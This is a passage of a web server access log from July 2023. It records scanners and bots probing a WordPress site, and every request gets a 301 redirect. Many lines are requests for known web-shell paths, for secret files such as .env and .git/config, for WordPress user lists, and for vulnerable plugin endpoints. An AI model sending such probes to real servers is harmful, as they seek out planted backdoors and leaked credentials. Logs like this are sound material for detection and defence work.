"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 162.142.125.13 - - [15/Jul/2023:09:46:45 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 183.136.225.44 - - [17/Jul/2023:05:34:07 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 183.136.225.44 - - [17/Jul/2023:05:47:08 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.44 - - [17/Jul/2023:05:48:03 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 45.81.39.172 - - [17/Jul/2023:09:41:22 +0700] "GET / HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 45.81.39.205 - - [17/Jul/2023:22:24:21 +0700] "GET /wp-content/plugins/hellopress/wp_mna.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [17/Jul/2023:22:24:59 +0700] "GET /wp-includes/theme-compat/footer-private.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [17/Jul/2023:22:25:50 +0700] "GET /repeater.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.9.101.54 - - [18/Jul/2023:06:56:44 +0700] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.9.101.54 - - [18/Jul/2023:10:06:37 +0700] "GET /style.php?sig=update&domain=51.79.124.111 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 205.210.31.213 - - [19/Jul/2023:04:01:28 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 45.81.39.205 - - [19/Jul/2023:05:49:51 +0700] "GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.1" 301 162 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" 45.81.39.205 - - [19/Jul/2023:11:02:24 +0700] "GET /style.php?sig=update&domain=51.79.124.111 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [19/Jul/2023:23:37:08 +0700] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [19/Jul/2023:23:37:42 +0700] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [19/Jul/2023:23:38:05 +0700] "GET /wp-admin/maint/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [19/Jul/2023:23:38:37 +0700] "GET /wp-admin/dropdown.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [19/Jul/2023:23:39:17 +0700] "GET /alfanew.php7 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [19/Jul/2023:23:39:35 +0700] "GET /alfa-rex.php7 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 167.248.133.190 - - [20/Jul/2023:18:26:32 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 87.236.176.150 - - [21/Jul/2023:09:13:47 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 24.199.89.11 - - [21/Jul/2023:18:24:19 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 148.72.232.95 - - [22/Jul/2023:01:46:12 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 148.72.232.95 - - [22/Jul/2023:01:46:14 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 148.72.232.95 - - [22/Jul/2023:01:46:15 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.81.39.205 - - [22/Jul/2023:13:40:59 +0700] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [22/Jul/2023:13:41:23 +0700] "GET /.well-known/pki-validation/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [22/Jul/2023:13:42:06 +0700] "GET /wp-admin/includes/moon.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [22/Jul/2023:13:42:30 +0700] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [22/Jul/2023:13:43:13 +0700] "GET /admin.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [22/Jul/2023:13:43:40 +0700] "GET /1index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 198.235.24.110 - - [22/Jul/2023:15:05:06 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 147.78.47.249 - - [23/Jul/2023:04:54:13 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [23/Jul/2023:04:54:16 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [23/Jul/2023:04:54:20 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [23/Jul/2023:04:54:23 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [23/Jul/2023:04:54:26 +0700] "GET /wp-content/plugins/elementor-pro/assets/css/editor.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 205.210.31.150 - - [23/Jul/2023:05:29:45 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 45.81.39.205 - - [24/Jul/2023:09:26:02 +0700] "GET /.well-known/pki-validation/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:26:11 +0700] "GET /.well-known/acme-challenge/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:26:35 +0700] "GET /wp-admin/network/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:26:59 +0700] "GET /xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:27:10 +0700] "GET /cgi-bin/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:27:21 +0700] "GET /css/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:27:54 +0700] "GET /wp-admin/user/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:28:04 +0700] "GET /img/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:28:23 +0700] "GET /wp-admin/css/colors/coffee/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:28:40 +0700] "GET /wp-admin/images/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:28:46 +0700] "GET /images/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:29:02 +0700] "GET /wp-admin/js/widgets/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:29:18 +0700] "GET /wp-admin/css/colors/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:29:52 +0700] "GET /wp-admin/includes/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:30:05 +0700] "GET /wp-admin/css/colors/blue/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [24/Jul/2023:09:30:23 +0700] "GET /wp-admin/xmrlpc.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 162.142.125.224 - - [25/Jul/2023:01:22:45 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 23.178.112.105 - - [26/Jul/2023:10:42:27 +0700] "GET /.well-known/acme-challenge/b6W38--RFhHSePWPJ7RKzRKayrN9SxvgxdKykeCfQ4c HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 3.14.10.154 - - [26/Jul/2023:10:42:27 +0700] "GET /.well-known/acme-challenge/b6W38--RFhHSePWPJ7RKzRKayrN9SxvgxdKykeCfQ4c HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 35.165.83.28 - - [26/Jul/2023:10:42:27 +0700] "GET /.well-known/acme-challenge/b6W38--RFhHSePWPJ7RKzRKayrN9SxvgxdKykeCfQ4c HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 139.59.182.142 - - [26/Jul/2023:10:43:55 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 139.59.182.142 - - [26/Jul/2023:10:43:55 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA084446) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1738.98 Mobile Safari/537.3" 139.59.182.142 - - [26/Jul/2023:10:43:55 +0700] "GET /.vscode/sftp.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:43:56 +0700] "GET /about HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:43:56 +0700] "GET /debug/default/view?panel=config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:43:56 +0700] "GET /v2/_catalog HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:43:57 +0700] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:43:58 +0700] "GET /server-status HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:43:58 +0700] "GET /login.action HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:43:58 +0700] "GET /_all_dbs HTTP/1.1" 301 162 "-" "Mozilla/5.0 (l9scan/2.0.434323e223e2335313e2330313; +https://leakix.net)" 139.59.182.142 - - [26/Jul/2023:10:43:59 +0700] "GET /.DS_Store HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:43:59 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:43:59 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:44:00 +0700] "GET /s/434323e223e2335313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:44:00 +0700] "GET /config.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:44:01 +0700] "GET /telescope/requests HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 139.59.182.142 - - [26/Jul/2023:10:44:01 +0700] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 45.87.9.205 - - [26/Jul/2023:10:46:12 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 94.46.220.95 - - [26/Jul/2023:10:46:27 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" 51.75.141.254 - - [26/Jul/2023:10:46:27 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.082584686 Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.15.157.177 - - [26/Jul/2023:10:46:28 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 202.74.239.11 - - [26/Jul/2023:10:46:28 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.134.225.36 - - [26/Jul/2023:10:46:42 +0700] "OPTIONS / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 202.74.239.11 - - [26/Jul/2023:10:46:42 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (iPad; CPU OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1" 51.81.167.146 - - [26/Jul/2023:10:53:33 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 Safari/604.1" 65.154.226.170 - - [26/Jul/2023:11:07:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/112.0.5615.121 Safari/537.36" 205.169.39.244 - - [26/Jul/2023:11:07:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 205.169.39.244 - - [26/Jul/2023:11:07:32 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 45.87.9.13 - - [27/Jul/2023:00:12:00 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 15.229.46.222 - - [27/Jul/2023:00:12:18 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 159.223.68.191 - - [27/Jul/2023:08:50:05 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 159.223.68.191 - - [27/Jul/2023:08:50:07 +0700] "GET /blog/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 159.223.68.191 - - [27/Jul/2023:08:50:07 +0700] "GET /wp/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 159.223.68.191 - - [27/Jul/2023:08:50:07 +0700] "GET /wordpress/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 159.223.68.191 - - [27/Jul/2023:08:50:07 +0700] "GET /new/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 159.223.68.191 - - [27/Jul/2023:08:50:07 +0700] "GET /old/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 159.223.68.191 - - [27/Jul/2023:08:50:07 +0700] "GET /test/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 159.223.68.191 - - [27/Jul/2023:08:50:07 +0700] "GET /OLD/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 159.223.68.191 - - [27/Jul/2023:08:50:07 +0700] "GET /backup/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 159.223.68.191 - - [27/Jul/2023:08:50:07 +0700] "GET /bk/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 45.87.9.77 - - [27/Jul/2023:14:23:32 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPad; CPU OS 11_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 45.81.39.205 - - [27/Jul/2023:15:53:47 +0700] "GET /alfa-rex.php7 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:53:55 +0700] "GET /alfanew.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:54:03 +0700] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:54:11 +0700] "GET /wp-admin/js/widgets/about.php7 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:54:20 +0700] "GET /wp-p.php7 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:54:28 +0700] "GET /wp-admin/repeater.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:54:36 +0700] "GET /wp-includes/repeater.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:54:45 +0700] "GET /wp-content/repeater.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:54:54 +0700] "GET /wsoyanz.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 45.81.39.205 - - [27/Jul/2023:15:55:02 +0700] "GET /yanz.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 